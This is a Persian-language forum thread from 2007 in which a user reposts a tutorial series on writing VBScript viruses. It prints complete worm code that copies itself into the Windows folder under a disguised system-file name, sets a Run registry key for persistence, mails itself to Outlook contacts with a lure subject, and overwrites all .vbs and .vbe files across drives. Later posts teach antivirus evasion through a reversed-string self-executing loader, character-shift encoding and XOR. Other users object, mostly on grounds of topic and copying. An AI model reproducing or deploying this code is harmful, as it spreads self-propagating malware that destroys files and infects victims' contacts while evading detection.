<LI dir=rtl>آلوده کردن فايل های ديگر
ساير ترفند ها و ويژگی های متفرقه
ولی توانايی های يه ويروس VbScript به همين جا ختم نميشه بلکه علاوه بر اينا ميشه خيلی کاری ديگه مثل خاموش کردن کامپيوتر و پاک کردن تغيير دادن و يا دستکاری هر نوع فايل روی کامپيوتر ميزبان و... انجام داد که به دلخواه می تونن استفاده بشن يا استفاده نشن. حتی خود شما هم می تونيد ترفند جديدی کشف کنيد. اما مراحل کلی ايجاد يه ويروس اينا هستند که در يه ويروس معمولی وجود دارند ولی هر کدوم از اينها مراحل خاص خودشو داره که توضيح هر کدوم به اندازه يه مقاله وقت می بره. مراحل نوشته شده در بالا ترتيب خاصی ندارن مثلا ميشه اول ويروس فايل های ديگه رو آلوده کنه بعد بياد خودشو از طريق Outlook منتشر کنه و در آخر بياد رجيستری رو دستکاری کنه.
۱- مرحله اول: توضيح نکات اوليه
برای شروع کار بايد با يکی از Objectهای (شئی) کليدی VbScript, که نوشتن اين ويروس ها برپايه اون بنا شده آشنا بشيد. اين شئی به اسم File System Object معروفه و تمام وضايفی چون Copy, Cut, Delete, Move, Create و... فايل ها و اداره فلدرها و درايوها بر عهده اون هست. پس بدون اون يعنی ويروس VbScript = کشک. خوب حالا ميايم به نحوه استفاده از اين Object در VbScript می پردازيم:
در VbScript برای استفاده از اشيا از تابع () CreateObject استفاده می شه. حالا برای استفاده از File System Object به صورت زير عمل می کنيم:

Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
متغيری معرفی می کنيم بنام FSO که اون رو با يک File System Object مقدار دهی کرديم يعنی از اين به بعد اون متغير برای ما نماد اين Object (شئی)‌ را دارد. خوب حالا بايد بدانيم اين شئی (يا اينگليسيش يعنی Object ) دارای توابعی (فرامين)‌ است که با استفاده از آنها می توانيم به اداره فايل ها, فلدرها و درايوها بپردازيم. اين مقاله را با مثالی از يکی از فرامين اين شئی که باعث پاک شدن فايل ها می شود به پايان می رسانم:

fso.DeleteFile("C:\Autoexec.bat") 'اين تابع به تنهايی کار برد ندارد بلکه بايد قبل از آن دو خط کد بالا را هم نوشته باشيم

در مقاله بعد شروع کدنويسی ويروس را خواهيم داشت با "دستکاری رجيستری برای اجرا در هر بار راه اندازی ويندوز". ادامه دارد.......

double_n
08-05-2007, 18:43

قربونت برم آراز جون که مقالاتت رو همه جا به اسم خودشون کپی می کنن

BabyBoy
08-05-2007, 20:18
آقا توروخدا بیخیال شو!!!
اول که اینجا کردی چت روم حالا هم شده کپی سایت ها و وبلاگ های مردم!
اگه سایت یا وبلاگی هست که احساس میکنی به درد میخوره می تونی لینکشو بدی.
درضمن اینجا انجمن برنامه نوسی با vb!!!

BabyBoy
08-05-2007, 20:32
قول یه ویروس باحال هم بهتون میدم یه زره کارش مونده.
امیدوارم تا قبل از کنکور تمومش کنم.
اگه کسی بتونه درمورد انتشار ویروسها هم توی اینترنت و ... مطلب بدردبخوری بده ممنون میشم (البته نه چیزی که تو وبلاگها نوشته شده :27: چون مشه گفت همه رو خوندم)

این تاپیک هم خراب نکنید .بزارید بیشتر سوال و جواب باشه نه کلکل و چرت و پرت
اگه خیلی به اینجور بحث ها علاقه دارید یه برنامه به اسمه Yahoo! Messenger ساخته شده که خیلی میتونه کمکتون کنه.

double_n
08-05-2007, 21:24

راستی - شما مدیری؟

mazi_z_PSP
08-05-2007, 22:10
بابا شما چتونه؟ خوب اینکه معلومه که اینارو خودم ننوشتم. خوب معلومه که از يه جايه ديگه گرفتم. ميخواستم به بقيه کسايی که اینارو نخوندن کمک کنم . اگر شما اینارو خوندين خوب بهشون هم کاری نداشته باشين.

mazi_z_PSP
08-05-2007, 22:12

خيلی گنگ حرف زدی.!! يعنی اینارو تو نوشتی؟ خوب اصلا به من چه. هرکی ميخواد نوشته باشه. من فقط خواستم اینارو به بقيه هم بدم

mazi_z_PSP
08-05-2007, 22:21
سلام بچه ها. امروز ديگه روز شماست, چون من ديگه از ياد دادن مطالب تئوری خسته شدم و ديگه می خوام شروع کنم. سيستم آموزش من‌ ــکه خودم هم همين طوری ياد گرفتم ــ به اين صورته که اول کد کامل ويروس رو می نويسم و بعد در مورد هر بخش اون به طور جداگانه توضيح می دم. البته هنوز چندتا مطلب ديگه در مورد ActiveX مونده بود ولی ديگه از خيرش گذشتيم. خوب کد يه ويروس نسبتا ساده VbScript به صورته زيره:

Dim Fso
Set Fso = CreateObject("Scripting.FileSystemObject")
WinDir = Fso.GetSpecialFolder(0)
VriPth = WinDir & "\COMDLG32.OCX.vbs"
Set WsShll = CreateObject("WScript.Shell")
WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \COMDLG32", "wscript.exe " & VriPth & " %"
Fso.CopyFile WScript.ScriptFullName, VriPath
Mailer()
Infecter()
'The Most Important Function ;-)
Function Mailer()
Dim AddressList, AdressLists, AddressEnteries
Set myOlApp = CreateObject("Outlook.Application")
Set myNameSpace = myOlApp.GetNameSpace("MAPI")
Set AddressLists = myNameSpace.AddressLists
For each Addresslist in AddressLists
Set AddressEntries = AddressList.AddressEntries
if AddressList.AddressEntries.Count <> 0 then
msgbox AddressList.AddressEntries.Count
For Num = 1 To 2
Set NewMail = myOlApp.CreateItem(0)
Set AddressEntery = AddressList.AddressEntries.Item(Num)
NewMail.To = AddressEntery.Address
NewMail.Subject = "Do U like War ?!!!"
NewMail.Body = "Hi "+ AddressEntery.Name + Chr(13) +" Veiw the Pics that I have Send u"
NewMail.Attachments.Add WScript.ScriptFullName
NewMail.DeleteAfterSubmit = True
If NewMail.To <> "" Then
NewMail.Send
End If
Next
End if
next
End Function
'The Infecter Function
Function Infecter()
Set Drives = Fso.Drives
For Each Drive in Drives
If Drive.IsReady Then
DoSearch(Drive)
End if
Next
End Function
'The DoSearch Function
Function DoSearch(Path)
Set Folder = Fso.GetFolder(Path)
Set Files = Folder.Files
For Each File in Files
If Fso.GetExtensionName(File.Path) = "vbs" Then
Checker(File.path,true)
End if
If Fso.GetExtensionName(File.Path) = "vbe" Then
Checker(File.path,true)
End if
Next
Set SubFs = Folder.SubFolders
For Each SubF in SubFs
DoSearch(Subf)
Next
End Function
Function Checker(Path)
Set VbFile = Fso.OpenTextFile(Path, 1, False)
VbText = VbFile.ReadAll
IsThere = InStr(1, VbText, MyText, 1)
If IsThere = 0 Then
Fso.CopyFile WScript.ScriptFullName, Path, True
End If
End Function

خوب با اين کد چی کار بايد کرد. شما می تونيد برای امتحان اينها رو در يه فايل با پسوند "vbs" ذخيره کنيد و ديگه کار تمومه. فقط کافيه روش کليک کنيد!. البته اگر يه ويروس ياب روی سيستمتون نصب باشه ممکنه سريعا بهش گيربده و نذاره شما اونو ذخيره کنيد. ولی من در مقالات بعدی طريقه مخفی کردن ويروس از چشم ضد ويروس هارو هم آموزش می دم پس زياد نگران نباشيد. و حالا نوبت ميرسه به توضيح بخش به بخش ويروس!!!!! [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
Dim Fso
Set Fso = CreateObject("Scripting.FileSystemObject")
WinDir = Fso.GetSpecialFolder(0)
VriPth = WinDir & "\COMDLG32.OCX.vbs"
از همين خط اول شروع می کنم! از Dim در VbScript برای... اه پس من اين سايت جديدم رو برای چی درست کردم خوب بيا بروتوش اول نکات ابتدايی VbScript مثل اعلان متغيرها و... رو ياد بگير بعد بيا از همين جا شروع کن (البته می تونی هم اينکارو نکنی بستگی داره به ضريب هوشی خودت ديگه که اينايی رو که من ميگم بگيری يا نه!). برای رفتن به اين سايت اينجا کليک کن ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]). ديگه ماگفتيم! خوب خط بعدی همونطور که قبلا گفتم برای تعريف شئ File System Object هستش (که در اصل در VbScript برای استفاده از ActiveX ها از تابع ()CreateObject استفاده ميشه). خوب پس الان يه متغير جديد داريم که اون رو با يک شئ FSO مقدار دهی کرديم. در خط بعد از يکی از متدهای اين شئ بنام ()GetSpecialFolder استفاده شده. در اصل از اين متد برای بدست آوردن شاخه های اصلی ويندوز مثل System و يا خود شاخه ويندوز از اون استفاده ميشه. در اين متد بايد يه عدد رو به عنوان مقدار اوليه وارد کنيد (مقدار داخل پرانتز)‌که در اينجا صفر هستش که با وارد کردن اين مقدار تابع شاخه ويندوز را باز ميگرداند که در اينجا اين مقدار رشته ای باز گردانده شده در متغير WinDir قرار می گيرد. در VbScript با استفاده از علامت & و يا + می توان رشته ها را به هم الحاق داد. در خط بعد نيز متغيری بنام VriPth معرفی کرده ايم و آن را با رشته ای که برابر با مجموع دو رشته WinDir و "\COMDLG32.OCX.vbs" مقدار دهی کرده ايم. برای مثال اگر شاخه ويندوز شما به صورت "C:\Windows" در درايو سی قرار داشته باشد در دستور قبلی اين مقدار در متغيير WinDir قرار می گيرد و در اين خط نيز اين دورشته يعنی "C:\Windows" و "\COMDLG32.OCX.vbs" به يکديگر متصل می شوند و مقداری رشته ای برابر "C:\Window\COMDLG.OCX.vbs" در متغير Vripth قرار می گيرد. اين رشته در اصل همان مسيری است که ما می خواهيم يک نسخه از ويروسمان را با نام COMDLG32.OCX.vbs در کپی کنيم. شايد برای شما سوال پيش بياد که چرا می خواهيم نام فايل رو تغير بديم اونم به اين شکل. جواب اينکه شما اصلا می تونيد اين کار رو نکنيد و لی همين باعث می شه که اگر کاربر (قربانی) احتمالا اين فايل رو در شاخه ويندوز خودش ديد نگه من اصلا فايلی با اين اسم ندارم (اسمی که ممکنه شما مثلا خودتون انتخاب کنبد مثل amirviri.vbs)‌ اما اين نامی که من انتخاب کردم يکم گول زننده هستش و شبيه اسم يکی از فايل های اصلی ويندوز هست و ممکنه طرف بی خيال بشه. پس شما هم يکم هوشتون رو بکار بندازيد. خوب ديگه فکر کنم برای امروز بس باشه.بقيه شو فردا ياد می دم. بای

Payman_62
09-05-2007, 03:38
سلام.
mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.

mazi_z_PSP
09-05-2007, 15:03
سلام.
mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.
قربونت بشم منم ميدونم . اینا هم ويروس نويسی در وی بی رو ياد ميدن

mazi_z_PSP
09-05-2007, 15:04
ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \COMDLG32", "wscript.exe " & VriPth & " %"
Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!

majj
10-05-2007, 06:55
ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!

پس بقیش کو

mazi_z_PSP
10-05-2007, 15:31
پس بقیش کو
بابا خب واستا. هنوز بقيشو درست نخوندی منتظر بعدی هستی؟

Maysam-BFU
10-05-2007, 19:00
چه جالب وقتی که وارد صفحه 13 شدم NOD32 گفت در اون صفحه یک Script ویروسی وجود داره.

ممنون از دوستان استفاده کردیم.

CrazyTux
10-05-2007, 20:25
توی این تاپیک همه چیز هست به جز ویروس نویسی و انتی ویروس ... فکر کنم بهتره اسم این قسمت را متفرقه بزاریم

mazi_z_PSP
12-05-2007, 13:29
توی این تاپیک همه چیز هست به جز ویروس نویسی و انتی ویروس ... فکر کنم بهتره اسم این قسمت را متفرقه بزاریم
شما اگر اون مطالب رو خونده باشی ميفهمی که همش در رابطه با ويروس نويسی هستش. بهتره ديگه نظر ندی

mazi_z_PSP
12-05-2007, 13:46
چطور ويروسمونو غير قابل شناسايی کنيم؟

سلام بچه ها. قراره از امروز آموزش مخفی سازی ويروس vbs رو از دست AV ها داشته باشيم. اما اول يکم توضيح:
در واقع زياد شدن و رايج بودن و قدرت بالای تخريب ويروس های vbs باعث شده که AVs (آنتی ويروس ها) در تشخيص اونا يکم زياده روی کنن به طوری که بعضی وقتا به بعضی فايل های vbs عادی هم گير ۳ پيچ می دن [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] طرز شناسايی اين ويروس ها توسط AVs درست مثل کدهای استفاده شده در خود اونا تابلوست. يعنی چی؟ خوب مثلا اکثر اين ويروس ها از اين فرمان CreateObject("Scripting.FileSystemObject") i در کد خودشون استفاده می کنن. خوب ويروس ياب ها هم از فرصت اشتفاده می کنن و هر فايلی که محتوی اين فرمان و چند فرمان تابلوی ديگه باشه رو به عنوان ويروس شناسايی می کنن (زحمت می کشن). ما هم برای اينکه سر اونا رو گول بماليم چکار می کنيم؟ بله بدترين نظر اينکه بگيم بايد بی خيال اين فرمان های شد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] و...
در اين مقاله و يکی دو تای آينده می خوام چند روش برای مخفی سازی vbs ها معرفی کنم که تمامشون توسط افراد می شه گفت حرفه ای (KaGra=Bridga virii group, jackie=LineZer0 group) امتحان شدن و کار می کنن و استفاده از هرکدومشون کد شما رو ۱۰۰٪ غيرقابل شناسايی می کنه!!
روش اول اينقدر سادس که فکر کنم اگر توضيحات رو تو خود کد بگم کافی باشه فقط بگم اجرای اين کد باعث ميشه تا ويروس خودشو در شاخه ويندوز کپی کنه و با تغيير در رجيستری با هر بار بالا امدن ويندوز اجرا بشه.

' Method by KaGara'' In [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]''txen emuser rorre no')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = OSF tes')redloFswodniW(redloFlaicepSteG.OSF = riDypoC'"sbv.xco.23glDmoC\" + riDypoC = htaPV')"llehS.tpircSW"(tcejbOetaerC = llehShsW teS'"ZS_GER" ,"% " + htaPV +" exe.tpircsw" ,"23GLDMOC\nuR\noisreVtnerruC\swodniW\tfosorciM\ERAW TFOS\MLKH" etirWgeR.llehShsW'htaPV ,emaNlluFtpircS.tpircSW eliFypoC.OSFon error resume nextSet fso = CreateObject("Scripting.FileSystemObject")Set fil = fso.OpenTextFile(wscript.scriptfullname)for I=1 to 8 buf = Fil.ReadLine 'خط به خط می خونه buf2= StrReverse(buf) 'هر خط رو برعکس می کنه buf3= Mid(buf2, 1, Len(buf2)-1) ' کاراکتر اضافی "'" ته هر خط رو پاک می کنه all = all& ":" & buf3 ' تمام خطوط رو کنار هم می زارهnextfil.Close()pasargad = Mid(all, 2, len(All)-1) 'کاراکتر اول رشته رو پاک می کنهexecute(pasargad) ' رشته داده شده رو اجرا می کنه
خوب ديديد چقدر سادس!! فقط بايد بگم در vbs اگر بخوايد چندتا فرمان رو تو يه خط بنويسيد بايد اونا رو با کاراکتر ":" از هم جدا کنيد. و همچنين فرمان execute که همه اين روش ها بر مبنای اين تابع بوجود می يان٬ رشته ورودی رو که يکسری فرمان vbs بايد باشه رو اجرا می کنه مثلا Execute(" a=100: b=200: msgbox a+b")i يه مسيج باکس با متن ۳۰۰ نمايش می ده. همچنين بايد بگم تو اين روش شما نبايد در کد خودتون از فرمان execute() استفاده کنيد چون دوتا فرمان execute تو در تو باعث ايجاد خطا می شه. مثلا: execute(execute(buffer))i دستور buffer رو اجرا نخواهد کرد.
خوب ديگه خيلی طولانی شد! اما دفعه بعد با يه روش ديگه که خيلی جالبتر و علمی تر و ... تر هست در خدمتتون خواهم بود

mazi_z_PSP
12-05-2007, 19:48
چطور ويروسمونو غير قابل شناسايی کنيم؟ (قسمت ۲)

سلام. تو پست قبلی درباره يکی از روش های مخفی سازی ويروس يا در اصل Virus Code Encryption (از اين به بعد با همين اصتلاح کار می کنيم) توضيح دادم که تقريبا روش خوبی بود. اما بزاريد يه سری روش های ديگه رو هم که معمولا در Encrypt سازی ويروس ها از اونا استفاده می شه معرفی کنيم.
خوب فکر کنم با ديدن مثال قبلی (تو پست قبل)‌ متوجه شده باشيد که اصل ساختار Encrypting (به رمز درآوردن) به چه صورته. ابتدا کد ويروس رو به روش ها مختلف Encrypt می کنيم بعد کدی می نويسيم که با هر بار اجرای ويروس کد Encrypt شده رو Decrypt (از حالت رمزی خارج کردن) کنه و با استفاده از فرمان Execute اونو اجرا کنه حالا ساير روش های Encrypt سازی.
ببينيد بيايد در اين مرحله اصلا فکر کنيم که نمی خايم کد vb رو Encrypt کنيم. مثلا فکر کنيد می خاييد نامه ای رو که به دوستتون نوشتيد رمزی کنيد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ای کلک)٬ خوب حالا چکار می کنيد؟ يه روش اينکه تمام حروف رو يکی ببرين جلو مثلا "honey" تبديل ميشه به "ipofz"٫ درسته بقول معروف روش ازگل هاست ولی حتی استفاده از همين روش هم AV ها رو عاجز می کنه. بزاريد يکم عملی ترش کنيم:
روش جمع/تفريق:
اين روش شبيه همون روش بالاست يعنی مثلا حروف يک رشته رو يک يا هرچندتا که بخايم جلو يا عقب ببريم. ديگه فکر کنم اينقدر حرفه ای هستيد که فقط نشون دادن مثال کافی باشه:

OldString = "This is a test!"
For i = 1 to Len(OldString)
NewString = NewString & Chr(Asc(Mid(OldString, i, 1)) + 23)
Next
اين کد مقدار اسکی هر حرف از رشته OldString را به اندازه ۲۳ واحد افزايش می دهد و آن را در متغيير NewString قرار می دهد. در پايان حلقه مقدار رشته NewString (مثلا يه چيزی مثل)٬ "ی↔…β−÷ا لت≤ه♀»غ" خواهد شد. مشکل اين روش اين است که روال عمليات Encryption با روال Decryption متفاوت است. يعنی برای از رمز در آوردن رشته جديد بايد از روال زير استفاده کنيم:

OldString = "ی↔…β−÷ا لت≤ه♀»غ"
For i = 1 to Len(OldString)
NewString = NewString & Chr(Asc(Mid(OldString, i, 1)) - 23)
Next
اين روال رشته ما رو دوباره به صورت "This is a test!" در خواهد آورد. (ايندفه ۲۳ تا کم می کنه) البته شما می تونيد از مقادير بيشتر يا کمتری برای اضافه يا کم کردن استفاده کنيد اما بخاطر داشته باشيد که مقادير اسکی از ۰ تا ۲۵۵ هستند و اگر مثلا شما مقدار اسکی کاراکتر "A" رو که ۶۵ هست بعلاوه ۲۰۰ يا منهای ۶۷ بکنيد از اين محدوده خارج شديد و باعث ايجاد خطا هنگام اجرای برنامتون می شيد.
فکر نمی کنم سخت باشه و فقط با يبار دوره ميتونيد اصلا خودتون يه همچين مقاله آموزشی بنويسيد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ايندفه خيلی طولانی شد!! ولی هنوز حرفه ای ترين روش مونده که ايشاالله مقاله بعدی.

mazi_z_PSP
12-05-2007, 19:57
چطور ويروسمونو غير قابل شناسايی کنيم؟ (قسمت ۳)
خوب داشتيم رو روش های encrypt سازی کار می کرديم و حالا روش بعدی:
روش XOR:
ميشه گفت اين روش رو بسياری از ويروس های نرمال asm هم برای encrypt سازی خودشون استفاده می کردند و تقريبا بهترين و شناخته شده ترين روشه! بايد بگم xor هم يه عملونده درست مثل + يا - و تقريبا تو تمام زبون های برنامه نويسی هم وجود داره. اما قسمت سخت کار درک روش کار اين عملونده! به اين عبارت توجه کنيد:

5 XOR 3 = 6
خوب همينه ديگه! اگر هيچ اطلاعاتی در مورد نحوه کار اين عملوند نداشته باشيد عمرا نتونيد متوجه بشيد بين ۳ و ۵ چه رابطه ای هست که بشه ۶!!!! در واقع اين عملوند با معادل های باينری اعداد يا حروف کار می کنه (اگر باينری بلد نيستيد هم خيالی نيست). و همونطوری که بايد/شايد بدونيد باينری ها فقط از ۰ و ۱ تشکيل ميشن. مثلا معادل باينری ۵ = ۰۰۰۰۰۱۰۱ و معادل سه = ۰۰۰۰۰۰۱۱. با اين توضيحات يه نگاه ديگه بندازيد:

0 0 0 0 0 1 0 1 معادل سه
0 0 0 0 0 0 1 1 XOR معادل پنج
==========
0 0 0 0 0 1 1 0 معادل شش
خوب حالا ديگه شايد به رابطش پی برده باشيد!! وقتی که عملوند XOR روی دو باينری تاثير می زاره همونطور که در بالا می بينيد اگر هردو بيت ۰ باشند بيت جواب هم ۰ ميشه. اگر يکی از بيت ها ۱ و ديگری ۰ باشه بيت جواب ۱ خواهد شد ولی اگر هر دو بيت ۱ باشه بيت جواب ۰ خواهد شد (در ضمن اين کار رو بايد با هر ۸ تا بيت انجام بديم)! خوب اگر به شماتيک بالا نگاه کيند می بينيد که طبق توضيح پنچ تا بيت اول (ما از چپ شروع می کنيم) که در هر دو باينری ۰ بوده پنج تا ۰ در باينری جواب بوجود آورده. در بيت ششم و هفتم هم يکی ۰ و يکی ۱ داشته پس جواب در هر دو حالت ۱ ميشه. اما بيت هشتم هر دو باينری ۱ هست پس بيت هشتم باينری جواب ۰ خواهد شده. و حالا ۰۰۰۰۰۱۱۰ مقدار باينری معادل ۶ هستش (بازم می گم لازم نيست شما مقدار باينری معادل هر عدد یا حروفی رو بدونيد!)

خوب حالا اين چه ربطی داشت؟ (تو قسمتای بعدی می گم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

تکنیک برتر
19-05-2007, 04:09
mazi_z_MCSDسلام دوست عزیز خوبی من تا الان می خواستم خودمو تو این تاپیک دخالت ندم ولی الان می خواهم اینکارو انجام بدم شما کاربر خوبی هستین ولی یخورده انگار اصبی هستی اینجور صحبت کردن درست نیست. ناراحت نشی یا گفتم بدونی من مدیر نیستم ولی وظیفه خودم دونستم اینو به شما گوش زد کنم چون از همین کلمات کوچک یهو این تاپیک ....... به راههای دیگه کشیده می شه و در آخر هم باید جمع بشه
ممنون

نقل قول:
نوشته شده توسط CrazyTux مشاهده تاپيک

جواب شما mazi_z_MCSD
شما اگر اون مطالب رو خونده باشی ميفهمی که همش در رابطه با ويروس نويسی هستش. بهتره ديگه نظر ندی

Naser_helboy
21-05-2007, 20:35
روش اول اينقدر سادس که فکر کنم اگر توضيحات رو تو خود کد بگم کافی باشه فقط بگم اجرای اين کد باعث ميشه تا ويروس خودشو در شاخه ويندوز کپی کنه و با تغيير در رجيستری با هر بار بالا امدن ويندوز اجرا بشه.
